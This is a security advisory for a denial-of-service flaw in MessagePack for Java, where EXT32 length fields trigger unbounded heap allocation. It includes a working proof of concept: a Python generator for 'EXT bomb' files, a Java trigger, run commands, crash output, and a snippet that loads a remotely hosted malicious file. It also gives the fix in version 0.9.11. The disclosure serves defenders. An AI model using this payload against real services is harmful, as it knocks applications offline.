PT-2026-6411 · Maven · Org.Msgpack:Msgpack-Core

Published

2026-01-05

·

Updated

2026-01-05

CVSS v3.1

7.5

High

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

Affected Components:
org.msgpack.core.MessageUnpacker.readPayload()
org.msgpack.core.MessageUnpacker.unpackValue()
org.msgpack.value.ExtensionValue.getData()
A denial-of-service vulnerability exists in MessagePack for Java when deserializing .msgpack files containing EXT32 objects with attacker-controlled payload lengths. While MessagePack-Java parses extension headers lazily, it later trusts the declared EXT payload length when materializing the extension data. When ExtensionValue.getData() is invoked, the library attempts to allocate a byte array of the declared length without enforcing any upper bound. A malicious .msgpack file of only a few bytes can therefore trigger unbounded heap allocation, resulting in JVM heap exhaustion, process termination, or service unavailability. This vulnerability is triggered during model loading / deserialization, making it a model format vulnerability suitable for remote exploitation.

PoC

import msgpack
import struct
import os

OUTPUT DIR = "bombs"
os.makedirs(OUTPUT DIR, exist ok=True)

# EXT format: fixext / ext8 / ext16 / ext32
# ext32 allows attacker-controlled length (uint32)

length = 1
step = 10 000 000

while True:
  try:
    # EXT32: 0xC9 | length (4 bytes) | type (1 byte)
    header = b'xC9' + struct.pack(">I", length) + b'x01'
    payload = b'A'  # actual data tiny

    data = header + payload

    fname = f"{OUTPUT DIR}/ext length {length}.msgpack"
    with open(fname, "wb") as f:
      f.write(data)

    print(f"[+] Generated EXT bomb with declared length={length}")
    length += step

  except Exception as e:
    print("[!] Stopped:", e)
    break
// Main.java
import org.msgpack.core.MessagePack;
import org.msgpack.core.MessageUnpacker;
import org.msgpack.value.ExtensionValue;

import java.nio.file.Files;
import java.nio.file.Paths;

public class Main {
  public static void main(String[] args) throws Exception {

    byte[] data = Files.readAllBytes(
      Paths.get("ext length 470000001.msgpack")
    );

    MessageUnpacker unpacker =
      MessagePack.newDefaultUnpacker(data);

    ExtensionValue ext =
      unpacker.unpackValue().asExtensionValue();

    // Vulnerability trigger:
    byte[] payload = ext.getData();

    System.out.println(payload.length);
  }
}
Compile
javac -cp msgpack-core-0.9.8.jar Main.java
Run (with limited heap)
java -Xmx256m -cp .:msgpack-core-0.9.8.jar Main
Observed Result:
Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
  at org.msgpack.core.MessageUnpacker.readPayload(...)
  at org.msgpack.core.MessageUnpacker.unpackValue(...)
var u = new java.net.URL("https://huggingface.co/Blackbloodhacker/msgpack/resolve/main/ext length 470000001.msgpack");
var d = u.openStream().readAllBytes();
var up = org.msgpack.core.MessagePack.newDefaultUnpacker(d);
up.unpackValue().asExtensionValue().getData();
Run:
java -Xmx256m -cp .:msgpack-core-0.9.8.jar Main
A remotely hosted model file on Hugging Face can cause denial of service when loaded by a Java-based consumer.

Resolution

This issue is addressed in https://github.com/msgpack/msgpack-java/commit/daa2ea6b2f11f500e22c70a22f689f7a9debdeae by gradually allocating memory for large inputs, for both EXT32/BIN32 data types. This patch is released in msgpack-java 0.9.11 https://github.com/msgpack/msgpack-java/releases/tag/v0.9.11

Impact

This vulnerability enables a remote denial-of-service attack against applications that deserialize untrusted .msgpack model files using MessagePack for Java. A specially crafted but syntactically valid .msgpack file containing an EXT32 object with an attacker-controlled, excessively large payload length can trigger unbounded memory allocation during deserialization. When the model file is loaded, the library trusts the declared length metadata and attempts to allocate a byte array of that size, leading to rapid heap exhaustion, excessive garbage collection, or immediate JVM termination with an OutOfMemoryError. The attack requires no malformed bytes, user interaction, or elevated privileges and can be exploited remotely in real-world environments such as model registries, inference services, CI/CD pipelines, and cloud-based model hosting platforms that accept or fetch .msgpack artifacts. Because the malicious file is extremely small yet valid, it can bypass basic validation and scanning mechanisms, resulting in complete service unavailability and potential cascading failures in production systems.

Fix

Resource Exhaustion

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Weakness Enumeration

Related Identifiers

GHSA-CW39-R4H6-8J3X

Affected Products

Org.Msgpack:Msgpack-Core